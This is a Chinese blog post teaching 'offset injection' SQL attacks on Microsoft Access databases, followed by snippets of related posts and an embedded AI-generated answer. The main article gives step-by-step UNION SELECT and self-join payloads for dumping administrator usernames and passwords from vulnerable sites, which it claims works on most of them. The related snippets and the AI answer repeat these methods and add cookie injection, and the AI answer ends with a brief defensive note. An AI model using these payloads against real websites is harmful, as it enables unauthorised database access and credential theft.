Access数据库高级偏移注入

最新推荐文章于 2024-07-11 14:56:11 发布
原创 最新推荐文章于 2024-07-11 14:56:11 发布 · 370 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了SQL注入攻击中的一种技巧,通过逐步增加字段数量来确定数据库表的字段数目,利用union select语句和内连接操作减少字段数量,直至爆破出账号密码。此方法适用于90%的注入网站,但受限于必须存在id字段的情况。

注入语句:
1、进行偏移检测
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12, from admin
2、* from (admin as a inner join admin as b on a.id=b.id)用这里的替换一下,减少字段的数量只到网页返回正确就可能爆出账号密码
3、a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4、a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
从1-4一步一步的尝试
此方法解决90%注入得到表,得不到字段的网站,但是条件有局限,必须要有id,有些偏移不出来
如一个网站有13个字段 order by 13 正确 14错误
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin(猜解的表名)

access偏移注入
weiliang369的博客
02-22 1795
access偏移注入 利用情景 1.偏移注入access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。 2.用于解决判断出表名,得不到字段的困境。 偏移注入的特点 1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。 2.无需管理账号密码字段,直接爆账号密码。 利用条件 1.已知管理表名 2.已知任意字段(一个或多个多个会增加几率) 影响偏移注入成功率的因素 1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段
渗透测试基础-Access数据库偏移注入
weixin_45488495的博客
04-12 574
渗透测试基础-Access数据库偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)
V1040375575的博客
09-08 615
ACCESS偏移注入记录 Access偏移注入原理,基本公式为: order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案; 也就是: orderby = 22 * = 6个字符 2 × * = 12个字符 22 - 12 = 10个字符 注入点: www.xxx.com/Newsview.asp?id=832 查询字段数: www.xxx.com/Newsview.asp?id=832order by 16回显正常...
Access数据库注入偏移注入
seek_2022的博客
05-02 3091
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
ACCESS数据库偏移注入
qq_39756628的博客
05-01 311
access数据库简介 access 关系型数据库,同时 也是文件型数据库,不需要端口号。 结构上与其他关系型数据库不同,只有表名、列名、字段名, 没有数据库名, 自己网站自己管,数据库*.mdb直接在自己网站目录下面,同时它也没有一些相关函数,如文件读写等,目前用的已经不多了。 注入偏移步骤 判断列数=》22 联合查询 逐个向前迁移判断表中字段数=》22-16=6 爆破字段内容: 一级偏移注入22-6×2=10 UNION SELECT 1,2,3,4,5,6,7,8,9,10,*from (ad
WEB攻防-通用漏洞-SQL注入-ACCESS一般注入偏移注入
weixin_45534587的博客
07-11 1224
同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的表必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin表的列数必须比当前查询的22列的列数少,因为要把查询到表塞进当前查询到列中,不理解往下看例子。union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin --回显错误。在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显。
【hack靶场学习】——access数据库注入
weixin_42090431的博客
05-17 724
那么在实际场景中,只需要先找到注入点,通过order by进行字段判断,再使用可控输入对目标数据库进行联合注入即可,本质上和MySQL的联合注入差不多,不过它没有information_schema库,需要猜解它的表名和列名,如果猜对了就会在网页上回显账号密码。SQL注入是非常常见的一个漏洞,如果程序员在编写网站源码时未对SQL执行语句作防护措施,那么用户输入就可以执行SQL语句,导致用户数据被删改、拖库、挂马等。1、判断注入点,一般来说单引号、减号、and等就可以判断是否存在注入
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1373
Cookie注入简介 什么是Cookie? Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
五、数据库注入——(2)access注入——偏移注入
weixin_45540609的博客
04-19 335
想手工注入和sqlmap爆破,实际上就是爆破字段名,但如果遇到奇奇怪怪的字段名,就无可奈何,这时候就会使用到偏移注入,绕过。 select * from admin => select admin.* from admin =>表名.* 代表表名里所有字段 偏移注入必须要知道表名(Burp爆破),而且注入点字段数要大于想要查询的字段数,在不知道字段名的情况下获取数据 原理解释 假设数据表字段是15个,回显点是8 admin表中字段有4个分别是id,username,passwor.
access数据库偏移注入
haha1314的博客
05-01 305
一、access注入 access只有一个数据库 A联合注入 1、order by 20 确定字段数 猜表名 2、union select 1,2,3,4,5,6 from admin 爆数字 3、union select password,2,3,4,5,6 from admin 猜列名 B逐字注入 1、 and exist(select * from admin) 猜表 ...
Access偏移注入
10-02
Access偏移注入教程 该文章出自『草哲's BLOG』,原文链接:http://www.337479.cn/alias/access-migration-into-the/
Access数据库--偏移注入
Y22Lee的博客
03-24 397
由于我的学习进度到了偏移注入,所以在网上也查找相关资料来查漏补缺填补我的不足,但是我发现我与网上的博主注入思路相差不大,区别在于他们大都使用了SQL 内连接函数 inner join帮助输出结果,下面是我的方法!对于Access数据库我上一篇的Access–cookie注入已经介绍过,偏移注入与cookie注入的方法和使用的函数部分相同。但是偏移注入的使用场景比它更加特殊偏移注入只需要爆破出任一表名,不需要知道任意字段名即可完成注入。a.偏移注入不只是针对Access数据库
Acces数据库注入|偏移注入
向阳-Y.的博客
11-06 589
Acces数据库注入方式和其他主流数据库稍微有不同,因为Acces数据库的特性,也不会存在高权限跨库。 1.Access一般采用暴力猜解的方式进行注入 和MySQL等注入都是大同小异的,只是Access不能查看information文件,只能靠暴力猜解,相关Mysql注入文章 2.Access偏移注入:解决列名获取不到的情况 所有的数据库注入方式基本相同,除了access注入,这里补充一下:access偏移注入 2.1.先找出有多少个列: http://xxxxxx?id=xx union all se
Access注入--偏移注入
weixin_45922278的博客
10-17 342
Access注入--偏移注入 Access偏移注入:知道表名,不知道字段名. 核心:tables_name.* 题目:http://59.63.200.79:8004/ 1.http://59.63.200.79:8004/ProductShow.asp?id=104 #去除id=104,通过cookie传参 #http://59.63.200.79:8004/...
Access-偏移注入
weixin_45634365的博客
03-02 381
在SQL注入的时候会遇到一些无法查询列名的问题,例如系统自带数据库的权限不够而无法访问系统自带库,例如Access根本没有系统自带库,需要强行猜解表名 在猜到表名无法猜到字段名的情况下,可以使用偏移注入来查询表里面的数据 像sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名比较奇怪,sqlmap就无能为力了 偏移注入终比较常用的方法是移位溢注 移位溢注 #假设admin表里面有id、username、password三个字段 #admin.*代表了admin表里所有的字段 select * fro
ACCESS数据库注入方式
最新发布
12-12
<think>嗯,用户想了解Access数据库注入的具体方式。根据提供的五个引用材料,我需要系统地整理攻击手法。 用户的问题很明确,直接询问注入方式。引用[2]提到了联合查询法和逐字猜解法两种基础手法。引用[3]则详细描述了偏移注入这种高级技术,特别适用于字段名未知的情况。引用[5]补充了cookie注入这种特殊场景下的操作方式。 考虑到用户可能是安全研究人员或渗透测试人员,我决定按攻击场景分类呈现:常规注入部分保留经典的联合查询和逐字猜解;高级技巧重点说明偏移注入的原理;特殊场景则强调cookie注入的实现方法。这样分层叙述能帮助用户根据实际环境选择技术路径。 技术细节上需要特别注意:引用[3]指出偏移注入的核心是利用admin.*代替字段名,通过逐步调整select字段位置来定位数据;引用[5]则提供了两种设置cookie的实操方式。这些关键点都要在回答中强调。 最后准备的相关问题既要覆盖技术延伸(如防护措施),也要考虑实战需求(如工具推荐)。用户如果是初学者可能会关心"判断数据库类型"这类前置步骤,专业人员则更关注"现代系统防护"这样的深度议题。 安全提醒是必要的补充。虽然用户没明确要求,但所有注入技术都应强调仅限授权测试使用。 </think> 根据提供的参考资料,Access数据库注入主要有以下几种攻击方式: --- ### 一、常规注入方式 1. **联合查询法(Union Select)** - 判断注入点后,通过 `order by` 确定字段数,再使用 `union select` 联合查询获取数据。 - **关键步骤**: - 猜解表名(如 `admin`、`user`) - 猜解列名(如 `username`、`password`) - 最终语句:`union select 1,username,password from admin` > *适用场景:已知表名和列名时高效提取数据[^2][^4]。* 2. **逐字猜解法(暴力枚举)** - 当表名/列名未知时,通过字典暴力枚举: - 猜表名:`and exists(select * from 表名)` - 猜列名:`and exists(select 列名 from 表名)` - 配合工具(如Burp Suite)自动化爆破。 > *特点:Access无系统表,依赖暴力猜解[^2][^3]。* --- ### 二、高级技巧:偏移注入 **适用场景**:已知表名但字段名未知。 **原理**:利用Access的查询特性,通过多次偏移定位数据。 **步骤**: 1. 查询表内字段总数:`order by N`(直到报错) 2. 构造偏移查询: ```sql union select 1,2,* from (admin as a inner join admin as b on a.id=b.id) -- 首次偏移 union select 1,2,3,4,* from (admin as a inner join admin as b on a.id=b.id) -- 增加字段逐步偏移 ``` 3. 通过页面显错位确定敏感数据位置。 > *关键:利用 `admin.*` 代替未知字段名,通过调整select字段数逐步逼近目标数据。* --- ### 三、特殊场景:Cookie注入 **条件**:参数通过Cookie传递(如ASP系统)。 **操作**: 1. 修改Cookie值:`document.cookie="id="+escape("1 and 1=1")`(浏览器控制台) 2. 或使用工具(如Burp)拦截修改Cookie。 > *特点:绕过前端验证,直接针对后端SQL逻辑[^5]。* --- ### 四、其他技术要点 1. **数据库类型判断**: - Access特有报错:`"Microsoft JET Database Engine"` - 函数差异:`len()`(Access) vs `length()`(MySQL) 2. **数据提取限制**: - Access联合查询字段数必须一致,需用 `null` 补齐。 --- ### 防护建议 - 过滤特殊字符(如单引号、括号) - 使用参数化查询 - 避免暴露错误信息 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值